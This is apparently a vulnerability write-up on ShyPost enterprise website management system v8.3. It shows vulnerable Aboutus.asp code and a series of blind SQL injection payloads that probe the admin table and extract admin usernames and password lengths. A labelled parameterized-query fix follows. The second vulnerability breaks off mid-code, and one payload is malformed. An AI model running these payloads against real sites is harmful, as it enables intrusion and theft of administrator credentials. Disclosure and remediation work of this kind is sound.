For certain needs, I analyzed the V8.3 version. Let's get started!

ShyPost enterprise website management system v8.3

Vulnerability 1: SQL injection, Aboutus.asp page

    <%
    Title = Trim(request("Title"))   ' request the title; only spaces are trimmed
    Set rs = Server.CreateObject("ADODB.Recordset")   ' create an object
    SQL = "select Content from Aboutus where Title='" & Title & "'"   ' the title is passed straight into the database query
    rs.open SQL, conn,
    %>

Specific use, EXP:

    '+and+'1'='1   // determine whether the vulnerability exists
    '+and+exists(select+*+from+admin)+and+'1'='1   // determine whether the admin table exists
    '+and+exists(select+username+from+admin)+and+'1'='1   // determine whether the username column exists
    '+and+exists(select+password+from+admin) and+'1'='1   // determine whether the password column exists
    '+and+(select+top+1+Len(username)+from+admin)>4+and+'1'='1   // determine the length of the username field
    '+and+(select+top+1+len(username)+from+admin)=5+and+'1'='1

The password is generally a 16-digit MD5, so you can use the statement above directly to check whether its length equals 16 or 32.

    '+and+(select+top+1+asc(mid(username,) from+admin)=97+and+'1'='1   // determine the ASCII code of the first letter of the account

Well, that is how it is used, and it is simple. You can guess the rest yourself.

Recommended fix: filter the ' symbol.

Vulnerability 2: SQL injection (numeric), CompHonorBig.asp page

    <!--#include file="Inc/conn.asp"-->
    <%
    dim id
    id = request.queryString("id")
    %>
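As an added example (not code from ShyPost or from the original post), the Aboutus.asp lookup from vulnerability 1 can bind the title through an ADODB.Command parameter instead of concatenating it, so the value never becomes part of the SQL text. It assumes `conn` is the open ADODB.Connection supplied by Inc/conn.asp; the 100-character limit and the `MAX_TITLE_LEN` name are hypothetical.

```vbscript
<!--#include file="Inc/conn.asp"-->
<%
' Added example: parameterized version of the Aboutus.asp query.
' Assumption: conn is the open ADODB.Connection from Inc/conn.asp.
Const MAX_TITLE_LEN = 100   ' hypothetical limit; match it to the Title column size

Dim Title, cmd, rs
Title = Trim(Request("Title"))

' Reject empty or oversized input before touching the database
If Len(Title) = 0 Or Len(Title) > MAX_TITLE_LEN Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1   ' adCmdText
' The ? placeholder keeps the title as data: a quote inside it
' cannot close the string literal and append conditions.
cmd.CommandText = "select Content from Aboutus where Title = ?"
' 202 = adVarWChar, 1 = adParamInput
cmd.Parameters.Append cmd.CreateParameter("Title", 202, 1, MAX_TITLE_LEN, Title)

Set rs = cmd.Execute
If rs.EOF Then
    ' Unknown title: return a fixed response with no database error text
    Response.Status = "404 Not Found"
Else
    ' Assumption: Content is admin-authored HTML meant to be rendered as is;
    ' wrap it in Server.HTMLEncode if it can contain untrusted text.
    Response.Write rs("Content")
End If

rs.Close
Set rs = Nothing
Set cmd = Nothing
%>
```

With the parameter bound, the probe strings listed under vulnerability 1 are compared against the Title column as literal text and match no row.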